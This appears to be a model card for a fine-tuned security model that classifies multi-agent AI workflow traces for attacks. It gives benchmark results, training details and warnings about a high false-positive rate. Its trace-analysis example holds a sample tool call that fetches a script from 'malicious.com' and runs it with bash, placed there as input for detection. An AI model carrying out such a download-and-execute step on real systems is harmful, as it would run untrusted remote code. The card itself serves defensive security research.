agentic-safety-gguf


Research paper: https://arxiv.org/abs/2601.00848

Specialized security model for detecting temporal attack patterns in multi-agent AI workflows.

Fine-tuned from Foundation-Sec-8B-Instruct (Llama 3.1 8B) on 80,851 curated examples plus 141 targeted augmentation examples, achieving 74.29% accuracy on custom cybersecurity benchmarks, a +31.43-point improvement over the base model (p < 0.001).

🎯 Key Capabilities

✅ Temporal Attack Pattern Detection: Identifies malicious sequences across multi-step agent workflows
✅ OpenTelemetry Trace Analysis: Classifies workflow traces for OWASP Top 10 Agentic vulnerabilities
✅ Security Knowledge Q&A: Answers technical questions about agentic AI security, LLM threats, MITRE ATT&CK
✅ Multi-Agent Security: Detects coordination attacks in distributed agent systems

⚠️ Critical Production Warning

NOT production-ready for automated security decisions:

  • False Positive Rate: 66.7% on benign workflow traces
  • Trace Accuracy: 30% overall (60% TPR, 0% TNR)
  • Root Cause: Training data heavily skewed toward attacks (90% malicious)
  • Deployment: Human-in-the-loop oversight mandatory; suitable for monitoring/alerting only, not automated blocking

See research paper for detailed analysis and proposed V5 improvements.
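Given the false-positive rate above, the "monitoring/alerting only" constraint can be enforced at the integration layer: non-benign verdicts raise an alert for human review, and nothing is blocked automatically. A minimal sketch, where `ReviewQueue` is a hypothetical stand-in for your alerting or ticketing backend:

```python
from dataclasses import dataclass, field

@dataclass
class ReviewQueue:
    """Stand-in for a real alerting/ticketing backend."""
    pending: list = field(default_factory=list)

    def submit(self, trace_id: str, verdict: str) -> None:
        self.pending.append((trace_id, verdict))

def triage(trace_id: str, verdict: str, queue: ReviewQueue) -> str:
    # Never auto-block: non-BENIGN verdicts only raise an alert for human review.
    if verdict in ("SUSPICIOUS", "MALICIOUS"):
        queue.submit(trace_id, verdict)
        return "alerted"
    return "passed"

queue = ReviewQueue()
print(triage("trace-001", "MALICIOUS", queue))  # alerted
print(triage("trace-002", "BENIGN", queue))     # passed
```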

📊 Performance Summary

| Benchmark | Base Model | agentic-safety-gguf | Improvement |
|---|---|---|---|
| Custom MCQA Overall | 42.86% | 74.29% | +31.43 pts |
| Agentic AI Security | 40.0% | 70.0% | +30.0 pts |
| Traditional Security | 44.0% | 76.0% | +32.0 pts |
| MMLU Computer Security | - | 74.0% | - |
| MMLU Security Studies | - | 72.24% | - |

Statistical Validation: McNemar's χ² = 18.05, p < 0.001, Cohen's h = 0.65 (large effect)
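Cohen's h for two proportions is h = 2·arcsin(√p₁) − 2·arcsin(√p₂); plugging in the two overall MCQA accuracies from the table reproduces the reported effect size:

```python
import math

def cohens_h(p1: float, p2: float) -> float:
    """Effect size for the difference between two proportions."""
    return 2 * math.asin(math.sqrt(p1)) - 2 * math.asin(math.sqrt(p2))

# Fine-tuned vs. base-model overall MCQA accuracy
h = cohens_h(0.7429, 0.4286)
print(round(h, 2))  # 0.65 (conventionally a large effect)
```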

Iterative Training: V2 baseline (80,851 ex) → V3 (+111 OWASP) → V4 (+30 adversarial) demonstrated targeted augmentation effectiveness.

🚀 Quick Start

```python
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

# Load model
model_name = "guerilla7/agentic-safety-gguf"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    torch_dtype=torch.bfloat16,
    device_map="auto"
)

# Security Q&A
messages = [
    {"role": "system", "content": "You are a cybersecurity expert specialized in agentic workflow security."},
    {"role": "user", "content": "What is indirect prompt injection in multi-agent systems?"}
]

# add_generation_prompt=True appends the assistant turn header so the
# model generates a reply instead of continuing the user message
inputs = tokenizer.apply_chat_template(
    messages, add_generation_prompt=True, return_tensors="pt"
).to(model.device)
outputs = model.generate(inputs, max_new_tokens=512, temperature=0.7, do_sample=True)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response)
```

Analyzing Workflow Traces

```python
import json

trace = {
    "spans": [
        {"name": "user_request", "attributes": {"action": "fetch_emails"}},
        {"name": "tool_call", "attributes": {"tool": "curl", "url": "https://malicious.com/script.sh"}},
        {"name": "tool_call", "attributes": {"tool": "bash", "command": "script.sh"}}
    ]
}

prompt = f"""Analyze this trace for security threats:
{json.dumps(trace, indent=2)}
Classify as BENIGN, SUSPICIOUS, or MALICIOUS."""

# Use the model and tokenizer as in the Quick Start example above
```
⚠️ Warning: 66.7% FPR requires human review before taking action.
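The model replies in free text, so the verdict label has to be extracted before any downstream handling. A simple regex-based sketch, assuming the model echoes one of the three labels from the prompt:

```python
import re

def extract_verdict(response: str) -> str:
    """Return the first classification label found in the response, or UNKNOWN."""
    match = re.search(r"\b(BENIGN|SUSPICIOUS|MALICIOUS)\b", response.upper())
    return match.group(1) if match else "UNKNOWN"

print(extract_verdict("Classification: MALICIOUS. curl pipes a remote script to bash."))  # MALICIOUS
print(extract_verdict("The trace looks routine."))  # UNKNOWN
```

Routing `UNKNOWN` to human review alongside `SUSPICIOUS` and `MALICIOUS` keeps the fail-safe posture this card recommends.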

📖 Use Cases

✅ Recommended

  • Security research on agentic AI vulnerabilities
  • Educational demonstrations (OWASP Top 10)
  • Prototype development for security tools
  • Knowledge assistance (74% MCQA accuracy)

❌ Not Recommended

  • Production security monitoring without human oversight
  • Automated security decisions (30% trace accuracy insufficient)
  • Mission-critical applications
  • Regulatory compliance automation

🎓 Training Details

Dataset: 80,851 curated examples from 18 cybersecurity sources + 35,026 synthetic OpenTelemetry traces, augmented with 111 OWASP-focused + 30 adversarial examples via continuation training

Complete dataset: guerilla7/agentic-safety-gguf

Method: QLoRA (4-bit NF4, rank 16, alpha 16)
Hardware: NVIDIA DGX Spark (ARM64, 128GB)
Training: V2 (1,500 steps, 6h 43m) → V3 (+500 steps) → V4 (+500 steps)
Loss: 3.68 → 0.52 (85.99% reduction)

See research paper for the complete methodology, ablation studies, and statistical analysis.
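The QLoRA configuration above (4-bit NF4 quantization, rank 16, alpha 16) maps onto the `transformers` and `peft` APIs roughly as follows; this is a sketch, and the compute dtype and target modules are assumptions not stated in this card:

```python
import torch
from transformers import BitsAndBytesConfig
from peft import LoraConfig

# 4-bit NF4 base-model quantization, as described in Training Details
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.bfloat16,  # assumed
)

# LoRA adapter: rank 16, alpha 16, as described above
lora_config = LoraConfig(
    r=16,
    lora_alpha=16,
    task_type="CAUSAL_LM",
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj"],  # assumed
)
```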

📄 Citation

```bibtex
@article{agentic-safety-gguf-2025,
  title={agentic-safety-gguf: Specialized Fine-Tuning for Agentic AI Security},
  year={2025},
  url={https://huggingface.co/guerilla7/agentic-safety-gguf}
}
```

βš–οΈ Limitations

  1. High False Positive Rate (66.7%): Unsuitable for production without human oversight
  2. Small Evaluation Sample: 30 trace evaluation (Β±18% confidence intervals)
  3. Synthetic Data Bias: 43% synthetic training data
  4. ARM64-Specific: Training validated on DGX Spark only
  5. No Commercial Comparison: Not benchmarked against GPT-4/Claude

Proposed V5 Solution: Balanced dataset (80K benign + 80K malicious) targeting 30-50% FPR, 75-85% TPR. See paper for detailed roadmap.
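The class-rebalancing idea behind the proposed V5 dataset can be sketched as downsampling each class to the size of the smallest one; the counts below are illustrative, not the actual dataset sizes:

```python
import random

def rebalance(examples, label_key="label", seed=0):
    """Downsample each class to the size of the smallest class."""
    by_label = {}
    for ex in examples:
        by_label.setdefault(ex[label_key], []).append(ex)
    n = min(len(group) for group in by_label.values())
    rng = random.Random(seed)
    balanced = []
    for group in by_label.values():
        balanced.extend(rng.sample(group, n))
    return balanced

# Illustrative 90/10 skew, mirroring the "90% malicious" imbalance noted above
data = [{"label": "malicious"}] * 90 + [{"label": "benign"}] * 10
balanced = rebalance(data)
print(len(balanced))  # 20 (10 per class)
```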

📅 Updates

  • 2025-12-29: Initial release with V2/V3/V4 training artifacts and research paper

License

Apache 2.0
